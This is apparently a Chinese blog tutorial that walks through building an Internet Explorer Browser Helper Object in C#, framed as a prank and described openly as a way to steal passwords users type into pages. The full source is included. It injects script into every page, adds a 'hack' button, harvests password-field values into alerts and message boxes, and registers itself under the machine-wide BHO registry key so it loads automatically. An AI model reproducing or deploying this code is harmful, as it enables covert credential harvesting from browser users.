BHO(Browser Helper Object)是插件,它寄存在IE浏览器中运行。在咱们的日常生活中无时无刻都在使用BHO,比如:迅雷检测用户是否单击了下载链接的BHO。用BHO也能做出些非常有意思的程序:窃取用户在网页上输入的密码信息等。
接下来,咱们也来制作一个恶搞的BHO吧,该BHO的功能如下:
1.注册成功后,每当用户浏览一个新的网页时,会自动在该网页中注入一个按钮
2.点击该按钮能获取用户在该网页中输入的敏感信息
操作步骤
图1
图2
图3
图4
图5
图6
图7
程序代码
IObjectWithSite.cs
using System;
using System.Collections.Generic;
using System.Text;
using System.Runtime.InteropServices;
namespace HelloBHO
{
[
ComVisible(true),
InterfaceType(ComInterfaceType.InterfaceIsIUnknown),
Guid("FC4801A3-2BA9-11CF-A229-00AA003D7352")
]
public interface IObjectWithSite
{
[PreserveSig]
int SetSite([MarshalAs(UnmanagedType.IUnknown)]object site);
[PreserveSig]
int GetSite(ref Guid guid, out IntPtr ppvSite);
}
}
BHO.cs
using System;
using System.Collections.Generic;
using System.Text;
using System.Runtime.InteropServices;
using SHDocVw;
using mshtml;
using Microsoft.Win32;
namespace HelloBHO
{
[
ComVisible(true),
Guid("8a194578-81ea-4850-9911-13ba2d71efbd"),
ClassInterface(ClassInterfaceType.None)
]
public class BHO:IObjectWithSite
{
WebBrowser webBrowser;
HTMLDocument document;
public void OnDocumentComplete(object pDisp,ref object URL)
{
document = (HTMLDocument)webBrowser.Document;
IHTMLElement head = (IHTMLElement)((IHTMLElementCollection)document.all.tags("head")).item(null, 0);
var body = (HTMLBody)document.body;
//添加Javascript脚本
IHTMLScriptElement scriptElement = (IHTMLScriptElement)document.createElement("script");
scriptElement.type = "text/javascript";
scriptElement.text = "function FindPassword(){var tmp=document.getElementsByTagName('input');var pwdList='';for(var i=0;i<tmp.length;i++){if(tmp[i].type.toLowerCase()=='password'){pwdList+=tmp[i].value}} alert(pwdList);}";//document.getElementById('PWDHACK').value=pwdList;
((HTMLHeadElement)head).appendChild((IHTMLDOMNode)scriptElement);
//创建些可以使用CSS的节点
string styleText = @".tb{position:absolute;top:100px;}";//left:100px;border:1px red solid;width:50px;height:50px;
IHTMLStyleElement tmpStyle = (IHTMLStyleElement)document.createElement("style");
tmpStyle.type = "text/css";
tmpStyle.styleSheet.cssText = styleText;
string btnString = @"<input type='button' value='hack' οnclick='FindPassword()' />";
body.insertAdjacentHTML("afterBegin", btnString);
}
public int SetSite(object site)
{
if (site != null)
{
webBrowser = (WebBrowser)site;
webBrowser.DocumentComplete += new DWebBrowserEvents2_DocumentCompleteEventHandler(this.OnDocumentComplete);
}
else
{
webBrowser.DocumentComplete -= new DWebBrowserEvents2_DocumentCompleteEventHandler(this.OnDocumentComplete);
webBrowser = null;
}
return 0;
}
public void OnBeforeNavigate2(object pDisp, ref object URL, ref object Flags, ref object TargetFrameName, ref object PostData, ref object Headers, ref bool Cancel)
{
document = (HTMLDocument)webBrowser.Document;
foreach (IHTMLInputElement element in document.getElementsByTagName("INPUT"))
{
if (element.type.ToLower() == "password")
{
System.Windows.Forms.MessageBox.Show(element.value);
}
}
}
public int GetSite(ref Guid guid, out IntPtr ppvSite)
{
IntPtr punk = Marshal.GetIUnknownForObject(webBrowser);
int hr = Marshal.QueryInterface(punk, ref guid, out ppvSite);
Marshal.Release(punk);
return hr;
}
public static string BHOKEYNAME = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects";
[ComRegisterFunction]
public static void RegisterBHO(Type type)
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(BHOKEYNAME, true);
if (registryKey == null)
registryKey = Registry.LocalMachine.CreateSubKey(BHOKEYNAME);
string guid = type.GUID.ToString("B");
RegistryKey ourKey = registryKey.OpenSubKey(guid);
if (ourKey == null)
ourKey = registryKey.CreateSubKey(guid);
registryKey.Close();
ourKey.Close();
}
[ComUnregisterFunction]
public static void UnregisterBHO(Type type)
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(BHOKEYNAME, true);
string guid = type.GUID.ToString("B");
if (registryKey != null)
registryKey.DeleteSubKey(guid, false);
}
}
}
资源下载